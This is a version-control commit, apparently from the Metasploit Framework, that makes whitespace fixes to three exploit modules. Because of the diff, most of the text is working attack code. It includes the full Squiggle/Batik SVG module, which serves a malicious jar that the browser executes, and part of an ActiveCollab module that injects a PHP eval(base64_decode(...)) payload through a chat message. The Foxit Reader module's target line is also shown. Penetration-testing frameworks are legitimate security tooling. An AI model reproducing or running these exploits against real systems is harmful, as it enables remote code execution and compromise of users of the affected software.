Msftidy fixes.

Fixed up activecollab_chat, batik_svg_java, and foxit_reader_launch

All whitespace fixes.

modules/exploits/multi/http/activecollab_chat.rb

@@ -16,9 +16,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'Active Collab "chat module" <= 2.3.8 Remote PHP Code Injection Exploit',
 			'Description'    => %q{
-				This module exploits an arbitrary code injection vulnerability in the chat module 
+				This module exploits an arbitrary code injection vulnerability in the chat module
 				that is part of Active Collab by abusing a preg_replace() using the /e modifier and
-				its replacement string using double quotes. The vulnerable function can be found in 
+				its replacement string using double quotes. The vulnerable function can be found in
 				activecollab/application/modules/chat/functions/html_to_text.php.
 			},
 			'License'        => MSF_LICENSE,
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# injection
 		iuri = datastore['URI']
 		iuri += (datastore['URI'][-1, 1] == "/") ? 'index.php' : '/index.php'
-		iuri << "?path_info=chat/add_message&async=1" 
+		iuri << "?path_info=chat/add_message&async=1"
 		phpkode = "{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}"
 		injection = "<th>\");#{phpkode}</th>"
 		cookies = "ac_ActiveCollab_sid_eaM4h3LTIZ=#{acsession}"
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		euri = datastore['URI']
 		euri += (datastore['URI'][-1, 1] == "/") ? 'public/index.php' : '/public/index.php'
-		euri << "?path_info=/chat/history/1" 
+		euri << "?path_info=/chat/history/1"
 
 		# execution
 		res = send_request_cgi({

modules/exploits/multi/misc/batik_svg_java.rb

@@ -1,129 +1,130 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info={})
-		super(update_info(info,
-			'Name'           => "Squiggle 1.7 SVG Browser Java Code Execution",
-			'Description'    => %q{
-					This module abuses the SVG support to execute Java Code in the
-				Squiggle Browser included in the Batik framework 1.7 through a
-				crafted svg file referencing a jar file.
-
-				In order to gain arbitrary code execution, the browser must meet
-				the following conditions: (1) It must support at least SVG version
-				1.1 or newer, (2) It must support Java code and (3) The "Enforce
-				secure scripting" check must be disabled.
-
-				The module has been tested against Windows and Linux platforms.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         =>
-				[
-					'Nicolas Gregoire', # aka @Agarri_FR, Abuse discovery and PoC
-					'sinn3r',           # Metasploit
-					'juan vazquez'      # Metasploit
-				],
-			'References'     =>
-				[
-					['OSVDB', '81965'],
-					['URL', 'http://www.agarri.fr/blog/']
-				],
-			'Payload'       =>
-				{
-					'Space' => 20480,
-					'BadChars' => '',
-					'DisableNops' => true
-				},
-			'DefaultOptions'  =>
-				{
-					'ExitFunction' => "none"
-				},
-			'Platform'       => ['win', 'linux', 'java'],
-			'Targets'        =>
-				[
-					[ 'Generic (Java Payload)',
-						{
-							'Arch' => ARCH_JAVA,
-						}
-					],
-					[ 'Windows Universal',
-						{
-							'Arch' => ARCH_X86,
-							'Platform' => 'win'
-						}
-					],
-					[ 'Linux x86',
-						{
-							'Arch' => ARCH_X86,
-							'Platform' => 'linux'
-						}
-					]
-				],
-			'Privileged'     => false,
-			'DisclosureDate' => "May 11 2012",
-			'DefaultTarget'  => 0))
-
-	end
-
-	def on_request_uri(cli, request)
-
-		agent = request.headers['User-Agent']
-		jar_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
-		jar_uri << "/#{rand_text_alpha(rand(6)+3)}.jar"
-		rand_text = Rex::Text.rand_text_alphanumeric(rand(8)+4)
-
-		if request.uri =~ /\.jar$/
-			paths = [
-				[ "Exploit.class" ],
-				[ "Exploit$1.class"],
-				[ "META-INF", "MANIFEST.MF"]
-			]
-
-			p = regenerate_payload(cli)
-
-			jar  = p.encoded_jar
-			paths.each do |path|
-				1.upto(path.length - 1) do |idx|
-					full = path[0,idx].join("/") + "/"
-					if !(jar.entries.map{|e|e.name}.include?(full))
-						jar.add_file(full, '')
-					end
-				end
-
-				fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "batik_svg", path ), "rb")
-				data = fd.read(fd.stat.size)
-				jar.add_file(path.join("/"), data)
-				fd.close
-			end
-
-			print_status("Sending jar payload")
-			send_response(cli, jar.pack, {'Content-Type'=>'application/java-archive'})
-
-		elsif agent =~ /Batik/
-			svg = %Q|
-			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">
-			<script type="application/java-archive" xlink:href="#{jar_uri}"/>
-			<text>#{rand_text}</text>
-			</svg>
-			|
-
-			svg = svg.gsub(/\t\t\t/, '')
-			print_status("Sending svg")
-			send_response(cli, svg, {'Content-Type'=>'image/svg+xml'})
-
-		else
-			print_error("I don't know what the client is requesting: #{request.uri}")
-		end
-	end
-end
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Squiggle 1.7 SVG Browser Java Code Execution",
+			'Description'    => %q{
+					This module abuses the SVG support to execute Java Code in the
+				Squiggle Browser included in the Batik framework 1.7 through a
+				crafted svg file referencing a jar file.
+
+				In order to gain arbitrary code execution, the browser must meet
+				the following conditions: (1) It must support at least SVG version
+				1.1 or newer, (2) It must support Java code and (3) The "Enforce
+				secure scripting" check must be disabled.
+
+				The module has been tested against Windows and Linux platforms.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Nicolas Gregoire', # aka @Agarri_FR, Abuse discovery and PoC
+					'sinn3r',           # Metasploit
+					'juan vazquez'      # Metasploit
+				],
+			'References'     =>
+				[
+					['OSVDB', '81965'],
+					['URL', 'http://www.agarri.fr/blog/']
+				],
+			'Payload'       =>
+				{
+					'Space' => 20480,
+					'BadChars' => '',
+					'DisableNops' => true
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "none"
+				},
+			'Platform'       => ['win', 'linux', 'java'],
+			'Targets'        =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'win'
+						}
+					],
+					[ 'Linux x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						}
+					]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "May 11 2012",
+			'DefaultTarget'  => 0))
+
+	end
+
+	def on_request_uri(cli, request)
+
+		agent = request.headers['User-Agent']
+		jar_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
+		jar_uri << "/#{rand_text_alpha(rand(6)+3)}.jar"
+		rand_text = Rex::Text.rand_text_alphanumeric(rand(8)+4)
+
+		if request.uri =~ /\.jar$/
+			paths = [
+				[ "Exploit.class" ],
+				[ "Exploit$1.class"],
+				[ "META-INF", "MANIFEST.MF"]
+			]
+
+			p = regenerate_payload(cli)
+
+			jar  = p.encoded_jar
+			paths.each do |path|
+				1.upto(path.length - 1) do |idx|
+					full = path[0,idx].join("/") + "/"
+					if !(jar.entries.map{|e|e.name}.include?(full))
+						jar.add_file(full, '')
+					end
+				end
+
+				fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "batik_svg", path ), "rb")
+				data = fd.read(fd.stat.size)
+				jar.add_file(path.join("/"), data)
+				fd.close
+			end
+
+			print_status("Sending jar payload")
+			send_response(cli, jar.pack, {'Content-Type'=>'application/java-archive'})
+
+		elsif agent =~ /Batik/
+			svg = %Q|
+			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">
+			<script type="application/java-archive" xlink:href="#{jar_uri}"/>
+			<text>#{rand_text}</text>
+			</svg>
+			|
+
+			svg = svg.gsub(/\t\t\t/, '')
+			print_status("Sending svg")
+			send_response(cli, svg, {'Content-Type'=>'image/svg+xml'})
+
+		else
+			print_error("I don't know what the client is requesting: #{request.uri}")
+		end
+	end
+end
+

modules/exploits/windows/fileformat/foxit_reader_launch.rb

@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Foxit Reader 3.0 Windows XP SP2', { 'Ret' =>  0x74d34d3f} ], # ebp + offset 
+					[ 'Foxit Reader 3.0 Windows XP SP2', { 'Ret' =>  0x74d34d3f} ], # ebp + offset
 				],
 			'DisclosureDate' => 'Mar 09 2009',
 			'DefaultTarget'  => 0))
@@ -107,4 +107,4 @@ class Metasploit3 < Msf::Exploit::Remote
 		pdf << "%%EOF\n"
 		pdf
 	end
-end
+end